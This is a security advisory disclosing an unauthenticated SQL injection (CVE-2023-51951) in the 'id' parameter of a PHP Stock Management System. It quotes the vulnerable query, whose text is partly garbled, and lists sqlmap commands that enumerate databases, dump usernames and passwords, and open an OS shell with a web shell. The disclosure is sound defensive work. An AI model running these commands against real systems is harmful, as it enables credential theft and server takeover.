Security Research & Advisories

SQL Injection in Stock Management System v1.0

Product Stock Management System
Affected Version(s) 1 and probably prior
Tested Version(s) 1
Vendor Notification 18 December 2023
Advisory Publication 18 December 2023 [without technical details]
Vendor Fix N/A
Public Disclosure 18 December 2023
Latest Modification 18 December 2023
CVE Identifier CVE-2023-51951
Product Description This is a Stock Management System in PHP and MySQL Database that provides an online and automated platform for shops or businesses.
Credits Josué Cruz Mier Security Researcher & Penetration Tester @wizlynx group

Vulnerability Details

SQL Injection
Severity: Critical CVSS Score: 9.8 CWE-ID: CWE-89 Status: Open
Vulnerability Description
The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0. An SQL injection occurs when a value originating from the client's request is used within a SQL query without proper sanitisation. This could allow attackers to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.
CVSS Base Score
Attack Vector Network Scope Changed
Attack Complexity Low Confidentiality Impact High
Privileges Required None Integrity Impact High
User Interaction None Availability Impact High



Source code:
Vulnerability location: /sms/admin/purchase_order/manage_bo.php, id parameter

Line 3 of manage_bo.php invokes a SQL query built with input that comes from an untrusted source, specifically provided in the 'id' parameter. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.

    $qry = $conn->query("SELECT p.*, as supplier FROM purchase_order_list p inner join supplier_list s on p.supplier_id =  where = '{$_GET['id']}'");
    if($qry->num_rows >0){
        foreach($qry->fetch_array() as $k => $v){
            $$k = $v;

... omitted for brevity ...

By sending in the id field the single quote character, the application returns an error message indicating the application is most likely vulnerable to SQL injection:

Extracting information via SQL injection Demonstration

Using SQLmap, we will automate the SQL injection exploitation to retrieve data from the database by using a technique based on error messages provided by the application:

Command: sqlmap  -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb --dbs

The screenshot above tells us five databases are available. We will now enumerate all tables within the sms_db database:

#sqlmap  -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb -D sms_db --tables

We can proceed to the next step which consists of extracting data within a table. As illustrated in the screenshot below, we were able to extract information from the users table:

#sqlmap  -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb -D sms_db -T users -C username,password --dump

Additionally, we were able to upload a web shell and execute commands directly from sqlmap as shown in the screenshot below:

#sqlmap  -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb –os-shell